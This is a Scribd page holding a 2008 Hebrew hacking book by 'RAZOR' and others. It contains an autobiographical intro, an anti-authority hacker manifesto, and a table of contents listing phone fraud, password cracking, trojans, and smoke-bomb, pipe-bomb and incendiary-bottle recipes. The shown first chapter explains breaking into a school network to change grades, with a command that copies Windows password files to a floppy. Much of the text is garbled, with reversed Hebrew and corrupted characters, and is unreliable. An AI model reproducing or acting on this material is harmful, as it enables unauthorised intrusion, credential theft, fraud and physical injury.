P. 1
ספר_פריצה

ספר_פריצה

4.0

|Views: 13,591|Likes:
Published by api-3748863

More info:

Published by: api-3748863 on Oct 15, 2008
Copyright:Attribution Non-commercial

Availability:

Read on Scribd mobile: iPhone, iPad and Android.
download as DOC, PDF, TXT or read online from Scribd
See more
See less

03/18/2014

pdf

text

original

By

R A Z O R
&
the new book / hacker
Hacker Fuck Microsoft
GeHeNoM, Blood Runner, Rul3r, Pirs[i]ng, !Man , "i#i , $r%Brain,
&a#a', Bent(, )*g+ b3ar, ,ce-ire3k, Rel.t, Milki, "/", 0B!Man,
&ool!Gu), 1eos, BoR23, waMaw, Boba 34ith, 5$ak*$a5, 1eBra,
0orte', #he!Mod, N$R3++, Ha3a#aN, G67G67#, &R633B68 %
לכ\היעב\קזנ\םישעמל ןפוא םושב יארחא אל ינא
תורישי אל הז טסקט תאירק ללגב םימרגנש רבד
תידומיל הרטמל איה ןאכ רמוחה לכ . ןיפיקעב אלו
. וב שמתשהל ןפואו םינפ םושב רוסאו דבלב
םולש
םירבדה לכ תא םשור דימת ינא רמאמ בתוכ ינאשכש ריהבהל הצור ינא לכ םדוק
. בלהמ אב הז - ידימ יתודלי וא ינשגר היהי הז םא יל וחלסת זא בלהמ
ימש Razor ( םויה Bidia-Boy > Old-Hacker > Razor )
9
תשר תא קופדל יתיצרו ןרקס יתייה דימת - 'ד התיכב ליחתמ ילש רופיסה
המוק יכ לזמ יל היה 'ד התיכל תיסחי ... ןיינעתהל יתלחתה - םינופלטה
זא רג יתחתמ Jacob ןב זא היה אוה - 18 תירבע עדוי אלש שדח הלוע -
טנרטניא זא היה אל - השוע אוהש המ תא יתבהא היסורמ יתילע םגש ינא
קר היה BBS ל המוד והשמ FTP ינא ... ) םיצבק ונממ דירוהל רשפאש תרש (
ל בורק תיבב ולצא יתבשי 5 אל םעפ ףאש עדוי ינא - בקעי ( םויב תועש
ה בשחמ לומ ) תאז לכב רעטצמ ינא לבא הלאה תורושה תא ארקת 486 ולש
םדומ םע 36 k ב בשחמה תא הנק אוה ( םור ידיסו 12 ינא זאו ) חש ףלא
לש תוריהמב םיצבק םידירומ ונתוא רכוז 3 k הרבח רעטצמ ( ... הינשל
ילש הרומה היה דימת אוה ןיינעל רוזחנ הככ זא ) היגלטסונ - יתחרמש
בשחמל עגונב תוצע תשקבמו וילא אב התייה ריעה לכ - חתות היה אוה - םיבשחמל
- ןמז ול ןיא רבכ לבא וילא םיאב םג םויה ! "ריעה לכ - םיזגמ אל ינא (
הריד רבע אוהש ירחא ...ילש ןושארה הרומה היה אוה זא בוט ) #שמהב וניבת
ילש ןושארה בשחמה תא יל ונק 133!z ) ןטק יתייה - יתייכב ינא (- העתפהב
יתלחתה זא - הנשמ אל ... הסאב ... ) סעכ אבא ( לוקה סיטרכ תא יתסרה ןושארה עובשה לע זא
תא םש יתרכהו וטסיג'וגב ןמאתהל SBH לכל יתיא ראשייש
דחא םיחותפ הייהנ דימת ונחנא ינא הפאו היהי אוה הפא הנשמ אלו םייחה
ב ינממ רגובמ היה םג אוה - ינשל 4 םיבשחמב חתות היה םג אוה - םינש
ילש בשחמה לע ונישע הנושארה םעפבו לוקה סיטרכ תא ןקתל יל רזע אוה
סודניוו ונקתה - יוסינ "5 םיחרכומ ונייה - היווח התייה תאז -
ב ונצביקש תורמל סודניווה תא םיטקסיד לע ריבעהל R#R הנכותה התייה תאז זא(
עקתיהל ןכומש והשימ - רבח הז $ בל ומיש ( םוי יצח ונל חקל ) םוחתב הליבומה
תצק יתרגבתהו םייתנשכ ורבע ... ונחלצה זא בוט ) #ליבשב קרו םוי יצח #תא
םגו SBH תא ריכה אל אוה םעפ ףא - בוחרה תא בזע בקעי ( SBH םג עדי אלו
ה םע ונלחתה ) "הז לע בשוח ינאש הנושארה םעפה תאז -ומויק לע Hacki$%
)#רעב 'ו התיכ ( קסעה תא %ירהל ונלחתהו םירזויו תואמסיס המכ ונגשה
ש ונסאבתה לבא הז תא ונבהא SBH לש ןובשח לביק 14&& אמיא ... הזכ והשמ
ינפל קר תפל רבע אוהש וליפא( ןופלטה לש וקה תא ול הרגסו הנבצעתה ולש
תא ריכמ ינאש ומכ לבא - בוש וקה תא ול וחתפ םישדוח המכ SBH לצלצ חטב אוה
תיבל הרידמ יתרבע ינא הזה הרקמה ירחא ) $( קזב ןובשח לע םלועה לכל
ה המוקב וישכע אצמנ ינא ( 3 קותמ #כ-לכ קרפ רגסנ זא .) בתוכ ינא םשמ תיבב
בושי ותואב הזש תורמל רוחאמ יתראשה םיבוט יכה םירבחה תא - ילש םייחב
הנש ירחא לאומש - השק רבעמ היה הז - םתוא יתבזע גניקאהה לש ןיינעב ויה אל םגש םירבח
םויה םש ראשנ םגו םש ראשנ זאמ ילש בוט רחא רבחו תפל רבע
... ) $) לבח - םידידי קר ונחנא םויה לבא(
תא רקבל ימצעל יתחטבה SBH ןיידעו יתחלצה - תוחפל תחא םעפ #רעב עובש לכ
םתוא רבוע ינא םויהש ולש םינחבמה לכו םיאליגה תורמל םיבוט םירבח ונייה
ובנג גניקירפה לש עטקה םע ונלחתה זאו ונרמש ונחנא בוט PB' ( 18&& דועו
םניח ןופלט ונל היה רקירפ לכל םולח היה הז זא - תוטישה לע ולע קזב םויה
- אשונל רוזחנ - #בוסמ רתוי הברה ןיינעה וישכע ! קזב ןובשח לע SBH רבע
ינממ קחורמ היה רשא םוקמל םדוקמ דוע רבע בקעי $) תפל ולש אמיא םע הריד
קוחר רתוי דוע םוקמל רבע בקעי ןמז ותואב ... רשק לע ונרמש ןיידע םלוא
םויהש ( בשחמ יקחשמ םע חומה תא יתקפד - ולא םינמזב םמעשמ ארונ יל היה . דבל יתראשנו
ש דע ) קיספהל םכל %ילממ - םהב עגונ אל ינא Ba)a$"11 "אב
וללגב םג זאו - גניקירפ!גניקאהה ייח בוש וליחתה - ז התיכב יתייה זא
תוצצפ ונישע - היכרנא & תיממע ןושלב - ייחל םזירורט לש ןיינעה סנכנ
... החירבב $) יתסרדנ טעמכו יירחא ופדר ( הינבמ םילבח ונבנג ! םירורפגמ
קחשל אלו םדא ןב ומכ רקאה תויהל יתרזח - םלולסמל ורזח םייחה הככ זא
%ורפל #יא דומלל יתלחתה קר אלא םהב יתקחיש אל זאמ ) בשחמ יקחשמ ( תויטשב
םעפה תא רכוז ינא חילצמ התאש הז ףיכ הזיא - ייחל גניקארקה לש עטקה סנכנ זאו - םתוא
ןכ ( תושגרתה לש העמד יל הלזנ וליפא עגושמ ומכ יתצפק תיבה לכב יתצר ) סקסב אל ( הנושארה
לכ תאש זא יתנבה - #רדה #שמהל חתפמה היה םג הזו ףיכה היה הז ) ינשגר ארונ םדא ינא
םע כחאו בקעי םע יתישעש תויוטשה SBH םע כחאו Ba)a$"11 יתצרפ אלא - םניחל ויה אל
םע דוע הז תא יתישע - הבר תובישח סחיימ אל ינא רתא תצירפל ( הנכות J#*OB הימיב
3
השק - בלב לבא החירז ומכ הז ' תושגר תיילע לש עגר היה הז זא - ) תשרה לש םינושארה
.רואיתל
השק רתוי הברה הייהנ רגתאהו וליחתה לאוורייפה לש תויטשה לכ חתפתה לכה זא הנשמ אל זא
קוחרש ןוכיתל יתרבעש םג ... 45 השק יל היה יתיבמ מק
המקשה ( 5+5& הרזח 16+&& רזח טאל טאל לכה זאו הקספה לש םישדוח המכ יתחקלו ... )
תא יתרקיב - ומצעל SBH תאו שדוחל םעפ #רעב יתרקיב דימת ינא בקעי תא תפב םימעפ המכ
. $( ילש ןכש אוה ... רקבל #ירצ אל ינא ןמטאב
ןב רבכ ינא - תרחא הז םויה 15 ) ינשה ןימה ללגב םג(... םירבדה לכל התוחפ תובישח סחיימ ינאו
. לנימירק אל םגו טסיכרנא תוחפ הברהב ינא ! הינופלט ! םירתא %רופ ינא ןיידע לבא
. לודג דסומב תורושקת תותשרב דבוע - בקעי
SBH . והשמ םינויצ ול היה אלש םושמ םיבשחמ תדיחיל ותוא וחקל אל - אבצב
Ba)a$"11 . וילע #ומסל רשפא דימת - ילש ןכש - עבשומ טסיכרנא -
Bidia boy ל #פהנש םושמ רטפנ - Old-!acker יברע רפכל רושקה םשב קיזחהל הצר אלש ללגבו
אל ... ןמזמ רבכ םגו הדפיטניאה ללגב ) קוחצב היה הז הלחתהב ( BO, .
Old-Hacker ל #פהו רטפנ - Razor . הלודג םיבשחמ תשרל הצירפ לע ספתנש םושמ
Razor . רפסה תא םכל בתוכו דמול!ןיזאמ!חצפמ!%רופ םשונ ייח -
! םלוכל תוושה תויכזה םולח ! תוישפוחה םולח - םשגתמ הז עגרבש םולח ! םולח יל היה דימת
לכל רבסהה אוהש םולח ! תושעל םילגוסמ םתאש םירחא םירבד שיש תעדל שפוח ! דומילה שפוח
אל םגו הידפולקיצנאב אורקל רשפא יאש םירבד םייחהמ ללכבו גניקאהמ ייחב יתדמלש המ
תורושב - תויפה תא ונל םימתוס םה ועדתש םיצור אל םה יכ הטיסרבינואב הז תא םכתא ודמלי
םיצור םתא םא ( הז לע ומלשתש םיצור אל ונחנא םניחבו םלוכל עדימה תא םיציפמ ונחנא הלאה
רוזעל דמלל םיצור ונחנא ) ונליבשב םולשתה היהי הז - םילוחל הקדצב לקש יצח ומיש הרקמ לכב
המודכו יאקורמ!יסור ונלצא ויא -... תודעה תא סורהל הרבחב תומרה תא ןזאל עדיה תא %יפהלו
(םיווש לכה -b! הרבח םיצור ונחנא ) םיבוט יכה םירבחה ונחנאו ילשל קוידב תדגונמה הדעה אוה
דמלנ ותוא תעדל הצורש ימ לכל ! םלוכל םירזוע ונחנא ... ירמגל םירחא םיללכ יפל הייחת רשא
לע םיקחוצ אל - םירחא תוגהנתה יסופד יפ לע םייח ונחנא - ונל הלעי הז המכ הז המ הנשמ אלו
םישגהל יל רוזעל #ישמהל םיצור םתא םא .םירחא ונחנא - ול ריבסהל םיסנמ אלא עדוי אלש ימ
תא
ףאו םישנא ודמלת ! םישנא רתויש המכל רפסה תא וציפת - םכמ דחא רבד שקבמ ינא ילש םולחה
לכוי אוהו םכמ רתוי עדויש ימ היהי דימת יכ עדוי אלש ימב ועגפת וא וקחצת לא םייחב לבא םעפ
םיווש היהנ םלוכ הככו עדיה תמחלמב חצנל ינשל דחא ורזעת - רבדה ותוא תא םכל תושעל
."םישפוח רתוי הברהו םידחואמ
םתאו ונתוא רוצעל וסנת דימת םתא - הלשממלו קזבל הרטשמל תונורחא םילימ המכ יל שי
תמרוזש תוישפוחה תא עדיה תא ורצעת אל םלועל םתא לבא טאל טאל וחילצת
ראשת םירקאהה ברקב היחה שפנה תא לבא יירבח תאו יתוא ורצעת םתא יתוא ילוא - ונקרועב
םוטאה תצצפ תא םתרצייש םתא - תינויווש הרבח בצעל םתיסינש םתא ! חצנל תטעובו היח
תא םיצורה םישנאל רובעל ונל ונת #רד ונפ תומולח יפלא תושפנ יפלא תומחלמב םתלזגש םתא
רוצעל וסנת לאו דחא לכל עיגמש ינויוושה קדצה תאו המכוחה תא םדאב םייקש בוט יכה רבדה
ונלוכל כהסב . ונלוכ תא רוצעל וחילצת אל לבא ונתאמ קלח ורצעת ילוא וחילצת אל יכ ונתוא
. " תוריחה יחי . " רתוי בוט םלוע תונבלו דמלל אלא %ורפל אל סורהל אל תפתושמ הרטמ
By RAZOR
)שדחמ( ךרועה רבד / המדקה
!םולש
אוה ימש HFM (Hacker Fro .icro-o/) וא Hacker F0ck Micro-o/) )
. ) הינש הסריג( אלמה ירביעה תורחה רפס תא םכינפב גיצהל תאזב האג ינא
: יבש ישפוחה םדא ןבה לש קלחה לע רפסי ינא בו
ןב וישכע ינא 15
:
תואנכת יתוא דמלל ליכתה תנכתמו יאנכת םיבשחמ הלוח ילש חא הנומש ליגב ליכתה לכה
PASCAL הצור אוה המ יתעדי אל תצקו( תילגנא יתנבה אל יתקספה דואמ רהמש קר ןבומכ
לכבו )תונקל אל דבל ןיכהל יאדכ( םיצפנב תויותש ינמ לכב יתקשעתה ןכמ רחאל ילש םייחהמ
ול ארקנ ןמרויפ רבח יל היה הז לכו תוצצפ לע תוירואת ינמ YF ינמ לכ איבה ןמזה לכ אוה
ינבב הלועפ לכו אבצב םיחא השולש ול היה שאב רושקה רבד לכוז םיצפנו תוצצפל םינונכת
אל אל דומלל יתלחתהןכמ רחאל םיצפנ !צופמו הרודמ קילדמ היה )יתד ינא ןכ ןכ(אביקע
םדוק DOS הזרוחאו QBASIC PASCAL VISUAL BASIC HTML JAVA SCRIPT ASP
BATCH הו זווודניו לע הברהו OFFICE ןכ לבא גניקאהה יניניעב יתייה אל ןיידע תאז תורמל
אב ילש חאו בשחמה תא סרוהש הז יתיה ינא ללכ ךרדב . "וכו םיקסיד תבירצו גניקארקב
אל ןיידע ריקזמ ינא( םייח יתישע .)תויועתמ םידמול דימת לבא( ןקתמו עובש #וסב ןכיתהמ
תא קיתעה אוהש יתיליג הז ירחא רקאה אוהש יתבשחש דחא היה ןוכיתל יתעגהשכ .)גניקאהב
ול םיארוק דואמ הברה אל לבא עדוי אוה ןכםירחא םירתאמ ולש רתאה לכ progra!! לדב
ב שמתשהל עדי אוהש SUB" מ רקיעב ןומה יתדמל זאו רקאה אוהש יתבשח זא
ASTALAVISTA ילש םירוההמ יתלביק ןורחאה לודגה שפוחב יתדמל יתדמל לכה יתמגרת
יל היה תונגהה לכ תא יל ויהש תורומל לבא יתרקחו יתקדב רתוי דוע רזע קר הזו ריהמ נרניא
ל יתרבעו ןקית ילש חא ןבומכ סויבהו בשחמה תא יל קפדו תועובש השולש ינפיל סוריו
#I$DOS %P תא יל וחקל זא ילש םירהה םא תובירמ הברה יל היהש יצחו עובש ינפל זאו
ל עיגהל יתלוכי אל ןכלו( םדומה "&& לכה ךורעל ןמז יל היה זאו )יתיצרש תורומל םידומע
!יפהלו ןכותה תאשדחמ בותכל תובתכ המכ דוע בותכל יל שי יל ועירפת לע וישכע תצק בותכלו
. הזה רפסה תא
הז תא סיפדהל לוכי רחא םדא ןב לכ וא הדוד אתבס אמא אבא םא םוחב !ילממ ינא םויסל
ךורכל םגו םניחב !!!רתויב !למומ
בלה לכמ ילש םיחא םכתא בהוא
עדיה שפוחל הכזינו יאוולהו
דעו םלועל םירקאהה חור תא רומשינו
BY HFM
ןכות
בתוכ רמאמה םש דומע
6ld!Hacker
םינויצ תונשלו סהיב תשרל %ורפל #יא
1&-11
6ld!Hacker
תואסרגה לכ היקונ לש םינופאלפב םניח תוחיש
12
6ld!Hacker
א קלח ' סהיבב תושעל יאדכ המ
13
6ld!Hacker
םיטרכלט לע םידבועש םינופלטב םניח תוחיש
14
6ld!Hacker
ןשע תצצפ
15
GeHeNoM תואמסיס תצירפ 8indows ;.<;= 16-18
GeHeNoM
ןופלט ירישכממ ףסכ בונגל #יא
1"-2&
=
GeHeNoM
ןופאלפהמ טוטיצ רישכמ תנכה
21
GeHeNoM לש הרוזנצה תמסיס תצירפ 1$)er$er 234lorer 22-23
GeHeNoM
טרכלט יסיטרכב רזוח שומיש
24
GeHeNoM
'ב הטיש ' טרכלט יסיטרכב רזוח שומיש
25
GeHeNoM >?@A !Mail B CDE F 26-2"
GeHeNoM >?@A !Mail G CDE F 3&-36
GeHeNoM >?@A !Mail H CDE F 35-
3"4
GeHeNoM ףויזל #ירדמ 2-.ail רצוקמ 4&-41
GeHeNoM
ב קלח ' סהיבב תושעל יאדכ המ
42-44
GeHeNoM
קוט גיבב םינוקייא
45
GeHeNoM
םיבשחמל הצירפ
46-4"
Rel.t
הרונמ תצצפ
5&
GeHeNoM
רבסה ' היכרנא
51
Blood Runner
טקסיד תצצפ
52
Blood Runner Port 3canning 53-54
,ce-ire3k
תויצרקב יתעמשמ לופיט
55
,ce-ire3k
םימל תחתמ םישימש םירורפג
56
GeHeNoM
יסקורפ יתרש
55-5"
1ero &ool
"/"
Blood Runner
רברס תונבל #יא $ןושאר קלח $םיבשחמ תויורשקתה
6&-62
7ike Iart +
טניילק תונבל #יא $ינש קלח $םיבשחמ תויורשקתה
63-64
Blood Runner תאירקל טנלטב שומיש !4ail 65-66
)*g+ b3ar
םינופלט תדפיטניא
65
Blood Runner
גנינקס טרופ
68-5&
Blood Runner תורתוכ תנבה 2-ail 51-54
GeHeNoM
יוביכ(הלעפה יכסמ תפלחה
55-56
Bent(
םישומיש םירפסמ
55-58
Bent(
לטרופ-רבייס הנכותה לורטנ
55-8&
Blood Runner
םיטייולפסקאל תואמגוד ' םירתאל הצירפ
81-84
Pirs[i]ng ה תא %יאהל #יא #6S7 ימדומב לבחל ) #6S7 85-86
waMaw
תואמסיס בונגל ידכ היגולוכיספב ומיש
85-88
BoR23
םלועב םסרופמ יכה רקאהה לש היפרגויב
8"-"1
!Man
םניח ףסכ
"2-"3
6ld!Hacker
םיפורוד ילב ' םניח ףסכ
"4
!Man
םלוכמ לוז רתוי טנרטניא לבקל #יא
"5
!Man
ףסכ תוטרופש תונוכמ לע דובעל #יא ' ...םניח ןמוזמ
"6-"5
Milki
6ld!Hacker
ירוביצ ןופלטב םולשת אלל רוביד
"8
6ld!Haacker
ילטורב חוכ
""
&ool!Gu)
Blackdeath
6ldhacker
עבצ תצצפ
1&&
1eos ל #ירדמה &racker ליחתמה 1&1-
1&3
0B4an ל רלבמסא &racker 1&4-
1&5
Pirs[i]ng & 1eos
#פהלו יראניבל ינורשע רפסממ #ופהל #יא
1&6
1eos ל תונגה חוציפ cd הסרג +%+ 1&5-
1&8
Pirs[,]ng
הנפצהו דודיק
1&"-
111
1eos
הרמה ' ילמיצדסקה סיסב
112-
114
J
1eos
אמסיס תנגה לש ישעמ חוציפל #ירדמה
115-
118
!Man ב תואמסיס תצירפ 8indows N# 11"-
12&
Ra(or
םירקאהה לש הקיתאה
121
Pirs[,]ng
גניקירפה לע תמא ) רקש
122
"i#i
םירקירפל תולבזמב שופיח
123
Boba 34ith #ni Bo' 124-
125
"i#i
קזנ לש תומודיקהו םידחוימה םירפסמה
126-
125
"i#i ירפסמ תקירס +.** 128-
12"
"i#i PBK 13&-
131
&n#a'
היקונב םינוט תריציל #ירדמה
132-
133
"i#i
םדיקפתו תונושה תואספוקה תמישר
134
"i#i
ריוואב םירדת תקירסל אלמה #ירדמה
135-
136
"i#i
תועבטמ לע םידבועש םינופלטל הצירפ
135-
138
Pirs[,]ng
םירדת
13"
Pirs[,]ng
'ב #רד ' תועבטמ לע םידבועש םינופלטב םניח תוחיש
14&
Pirs[,]ng
ירלולס ןובישמל הצירפ
141
Pirs[,]ng
תועדוה תחלישב חלושה רפסמ ףויז
142
"i#i Beige bo' 143-
144
* $ak*$a * ב םירדח תצירפ Mirc 145
* $ak*$a * ב םיקינ תצירפ Mirc 146
1eBra
הרעבת קובקב
145
Ra(or
רויבל תונבל #יא
148
1eos 8indows #ricks Part + 14"-
151
1eos 8indows #ricks Part 9 152-
153
Pirs[,]ng 8aI 154-
155
L*gl!B3ar תרזעב םירתאל הצירפ Mni&ode 156-
158
Rul3r
ינייורט לע ףיקמה #ירדמה
15"
Pirs[,]ng & 1eh
גניטנבאס
16&-
161
0orte'
טנלט #רד ימינונא ראוד
162-
164
&n#a' תונובשח 3hell 165-
166
Pirs[,]ng
םילוקוטורפ
165-
168
+ #wi' , תבכשל אובמ 63, 16"-
151
&a#a'
םירקאהה תוברת
152-
153
#ricker לע עדימ ,P תודוקפ יע םיצורעו Netstat 154-
156
N
0b!Man ב תוימינונא irc 155
#he!Mod - ל הצירפ icO 158-
183
Pirs[,]ng
המגוד - . הצירפ איה המ
184-
186
Ra(or & Boba 34ith תפשב םינוט תריצי & 185-
188
Pirs[,]ng
םילבכ לש םינוש םיגוס לע רבסה
18"-
1"1
Pirs[,]ng
םילבכ לש םינוש םיגוס סורהל #יא
1"2
Pirs[,]ng & Rul3r
םיגשומ
1"3-
1"4
N$R3++
םירחא םישנא לע םירבד תולגל #יאו ימינונא תויהל ןיא - תוימינונא
1"5-
1"5
Pirs[,]ng
רלבמסא לע ףיקמ #ירדמ
1"8-
2&2
1irocool
הנוכנ הצירפ
2&3-
2&4
םייחב םעפ לש תוצירפ
2&5-
2&8
1irocool & Psko#ra( PR6KL תיתימא תוהז לע הרימש ' 2&"-
21&
1irocool
בשחמה #ותב הנוכנ הדובע
211-
212
1irocool לש תואמסיסה %בוקל הצירפ &ute-#P ו 8sP-#P 213-
214
1irocool M6#6R67" יאנכט דוק ' 215-
216
Iatcher ( .לא.וילבד.יפ יצבק P87 -,7 ) 215-
218
Patcher
הללאו לש תונובשחל תמכחותמ #רדב הסינכ
21"-
221
Iatcher "dware 222
G667G67#
תוימינונא
223
G667G67# -aking -ile #ransQer 224
G667G67# ל הצירפ 8,N$63 225-
225
G667G67# & H-M
ויקיסייאה #רד םישנא לש יפ ייא גישהל #יא
228
G667G67# ב םיצבק לוהינ -#P סוד #רד 22"-
231
G667G67# ( ילטורב חכב שומיש 888H"&/ (םירתא %ורפל ידכ) -#P/!4ail 232-
234
G667G67#
סוריו יטנא ילב ןאירוט תולגל
235-
23"
G667G67# #&P/,P 24&-
242
G667G67#
םייסיסב םיגשומ
243
Reshet3***
ןאירוט אלל ףוטיש #רד הצירפ
244
Reshet3***
תולקב בשחמל רורא תועדוה תעלעה
245
G667G67# עלקמ + 246
G667G67#
םירמילה לש הנכותה סבטנ
245-
24"
Ha3a#aN
ליימטוהב גאב
25&-
251
Ha3a#aN
םירתאל הצירפ
252
.
Ha3a#aN םירתאל הצירפ 9 253-
254
Ha3a#aN 337 255
Ha3a#aN
רקאהל תורבידה תרשע
256
Ha3a#aN לש תואמסיס ףוקעל #יא 86R$ 255
Ha3a#aN רורא תעדוה 9 258
Ha3a#aN
םילוענמ תצירפ
25"-
261
Ha3a#aN "utorun 262-
263
Ha3a#aN 0,3M"7 B"3,& #6RG"N 264-
268
Ha3a#aN B,63 26"-
25&
Ha3a#aN
ילטורב חוכ
251-
253
Ha3a#aN Radi' 254
Ha3a#aN &hat 255
Ha3a#aN &H6/ 256
Ha3a#aN $N3 דבוע הז#יא 255
Ha3a#aN תופקתה $63 258-
25"
Ha3a#aN ל הצירפ M3N4essenger לו )ahoo4essenger 28&
Ha3a#aN -#P 281-
282
Ha3a#aN ב שומיש -#P רתאל הצירפל רזעכ 283
Ha3a#aN -un cit) 284-
288
Ha3a#aN
םיקתממה לש תונוכמהמ הבינג
28"-
2"1
Ha3a#aN
תשרוממ(ל הצירפ
2"2-
2"3
Ha3a#aN
תוספדמל הצירפ
2"4-
2"6
Ha3a#aN יתרשל הצירפ ,33 םניחב ןימוד תלבקו 2"5-
2""
Ha3a#aN ,I טנרטניא תובותכו 3&&-
3&2
Ha3a#aN @?D@H ,P RSBG TD?HT @U DT 3&3
Ha3a#aN ,36!63, 3&4-
3&6
Ha3a#aN םיגשומ ןולימ 2 $ 3&5-
3&8
Ha3a#aN NetB,63 3&"-
315
Ha3a#aN NoVel 316-
32&
Ha3a#aN Port scan 321-
323
Ha3a#aN S@W@?D SR?TCS 324
Ha3a#aN 3H77 "&&6MN# XDDBT S?W?GTEY 325-
325
Ha3a#aN ZS?B R[?\ ?]T^ ]\?WS R_?TD RU?D @B`^T a@_bTU] 328
Ha3a#aN ZS?B R[?\ ?]T^ ]\?WS R_?TD RU?D @B`^T a@_bTU] 32"-
33&
;
Ha3a#aN D ][@Rb -ortres 331
Ha3a#aN M!$!P 332-
333
Ha3a#aN @SRT -#P S?W^?S? XS@DHWBGYa@_cC_ D?b aB 334-
335
Ha3a#aN & Golgolet ]D@HR ]C_H?R 338
Golgolet & Ha3a#aN ? T?_ \DCU םיעלקמל תוימוג 33"
Goolgolet & H-M a@[bWD ]@\T] d?WHWU 34&-
341
H-M ]R?WU S[[b 342
H-M
שיש בוט יכה עלקמ
343
H-M
רוניצ ןעטמ
344
H-M
בשחמל הצירפ
345-
346
Progra4:: a@DHU Z@B ,P YCR@UG ?]T@U DT M,R& X 345
Progra4::
םהילא %ורפילו םירתא ליפהל
348-
351
Progra4::
טילפס טנ
352
Progra4::
לייאמ יא תובית תריגס
353
Progra4::
םיקיחצמ תומש
354
H-M
ןופאלפל תועדוה תחילשו םניחב םירתא םיקיזחמש םיתרש
355-
356
Ha3a#aN
םימ ליט
355
Ha3a#aN 8inGates 358-
35"
&rossbow
םימורופל הצירפ
36&-
361
&rossbow
)םיפלכ קחשמ( לסירפל הצירפ
362
&rossbow ב גאב 8,N$63 363
&rossbow ב תודחוימ תויקיטב םיקירט 8,N$63 364-
365
&rossbow יע החטבאב םירוח תאיצמ 3"#"N 366
&rossbow
תוידוס תויקית
365
&rossbow תלבגה תפיקע 8,N$63 הטלקהב 368
&rossbow ל תוצירפ ינמ לכ 8,N$63 36"-
351
&rossbow
#סמ רמושה לש המסיסה תצירפ
352
&rossbow
קוחמל רשפא יאש תויקת
353
&rossbow
םישקומ הלושל הצירפ
354
&rossbow
השקבב בשחמה תא סורהל םיצור
355
&rossbow
תוצצפ תקינכת
356
&rossbow
בשחמב תירביע #ל ןיאו תירביעב העדוה חולשל הצור
355
&rossbow
וובסורק לש ירבעה וטספינמה
358
&rossbow
הלעפה תכרעמב הדובע לע תצק
35"
Golgolet
גנופ-גניפ רודכמ ןשע תצצפ
38&
Golgolet
שקומ ןיכהל #יא
381
Golgolet
ליתפ ןיכהל #יא
382
Golgolet תצצפ &69 383
Golgolet
םישקומל טושפ ןצחל
384
Golgolet
ליפר תצצפ
385
Golgolet
ןוינקב םיקחשמ לש תונוכמ לע דובעל
386-
385
Golgolet
בשחמ #רד םירומ עגשל)זיגרהל #יא
388
Golgolet
'ג קלח ' רפס תיבב תושעל םיפיכ םירבד
38"-
3"&
+*
Golgolet ה תפלחה ( תצירפ ,&6N 3"1-
3"2
&rossbow הנבמ #&P/,P 3"3-
3"4
&rossbow %בוקב שומיש Mser%e'e זואודניוב תוליעפ םשל 3"5
&rossbow ( בשחמב םידחוימ םיצבק לע תצק autoe'ec%bat ) 3"6
4icrosoQt לש תודוקפ #7N# 3"5-
3"8
4icrosoQt לש םיגשומ ןולימ 8,N$63 KP 3""-
484
Gege+
םלועבו %ראב גניקאה ירתא
485-
485
Gege+
הזיו רפסמ וא המסיס לכ לבקל #יא
488
Gege+ םיגישמ #יאו הצירפל הלבזיח ירתא ,P 48"
H-M & &rossbow
תונכת רודמל החיתפ
4"&
Ha3a#aN Batch 4"1-
4"3
Ha3a#aN Batch #שמה 4"4-
4""
&rossbow Batch 5&&-
5&2
&rossbow Batch #שמה 5&3-
5&4
&rossbow Batch תירביעב 5&5
&rossbow ב רמיט Batch 5&6-
5&5
&rossbow ב םימדקתמ םינתשמ Batch 5&8-
5&"
&rossbow "8/ 51&-
511
&rossbow H#M7 512-
513
&rossbow f"0" 514-
518
&rossbow f"0"9 51"-
525
&rossbow #MRB6 P"3&"7 526-
538
&rossbow
לקספב תועיגש
53"-
541
&rossbow ב םדקתמ שומיש #6RB6 P"3&"7 542-
54"
&rossbow
לקספב םירטמרפ םע הדובע
55&-
551
&rossbow
לקספ תפשב תויעב ןורתפ לע תצק דוע
552-
554
&rossbow
לקספל םילילצו לוק
555-
556
&rossbow
לקספב םינתשמה יגוס יוניש
555-
558
&rossbow תפש gM,&/ B"3,& 55"-
561
&rossbow "%P%, . 562
&rossbow 0,3M"7 B"3,& 563-
564
++
&rossbow
קיסיב לאו'זיוב טנ'גאב שומיש
565
&rossbow
קיסייב לאו'זיוב דרובפילק םע הדובע
566
&rossbow
קיסייב לאוזיוב םיעבצב שומיש
565
&rossbow ב םינתשמ 0,3M"7 B"3,& 568-
56"
&rossbow
קיסייב לאוזיוב םיצבק םע הלועפ
55&-
551
&rossbow 0,3M"7 B"3,& 3&R,P# 552-
555
&rossbow ב תויביטקארטניאב שומיש 0,3M"7 B"3,& 3&R,P# 556-
558
&rossbow 0,3M"7 B"3,& 8,N36&/ 55"-
58&
&rossbow
קיסייב לאוזיו #ותב ירטסי'גרב שומיש
581-
588
&rossbow
ירניב ןובשח
58"-
5"&
&rossbow
תויפוס ןיא תואלולל #ירדמה
5"1-
5"3
&rossbow
תירלודומה הקירטמיראה סיסב
5"4-
5"5
&rossbow
תמדקתמ תירלודומ הקטמתירא
5"8-
6&&
&rossbow תונכית 3hell סקונילב 6&1-
6&3
R"16R הפסוה H-M
רשק רוצ
6&4
R"16R הפסוה H-M
תודות
6&5
R"16R הפסוה H-M
רבד ףוס
6&6
+9
םינויצ תונשלו ס$היב תשרל !ורפל ךיא
... הז תא תושעל םלח דחא לכש ןימאמ ינא ! בוט
אצמנ אל ללכב התאש ןמזב ןויצב התיכה לש ןונחה תא ףוקעלו ןוכיתה לש תשרל %ורפל
""" םכמולח תא םישגהל #יא ודמלת םויה . םירועישב
לש תרשל החונה הצירפה היהת אל וז walla הלוק התוש תיבב אסכה לע חנ התאש תיבב
לוכי התיכה לש ןפנחה דימת יכ השק הצירפ היהת וז ! תוחידב רפסמו םירבח םע הציפ לכואו
#תוא ספות האב יארחאה זאו .".".. השוע אוה המ הזה דליה תא לכסת ' יארחאל רמול
. .. םלועה ירענ לע סואמ יכה הנבמב תויהל הכירצ רחמש #לש אמיאה תאו #תוא ןייזמו
התא הילעש םיבשחמ תשר התוא לע תויהל םיכירצ םינויצה הצירפה םשל ןושאר רבד בוט
. הלועפה תא השוע
$ ליחתנ בוט
$ םיכרצמ
+ % ) תולשפ ויהי אלש שדח ( טקסיד
9 % %מוא
3 % הנכומ טולימ תינכות
בלש 1
ל סנכנ בשחמה תא קילדמ התא windows לוטיב %חול התא .. אמסיס #ממ שקבמ בשחמהו
. קלדנ בשחמהו רושיא וא
ל #לוה התא Run .
%חולו &o44and
ןולח #ל חתפנ זא $os
בתוכ התאו
coI) ch<windows<i%Iwl a $
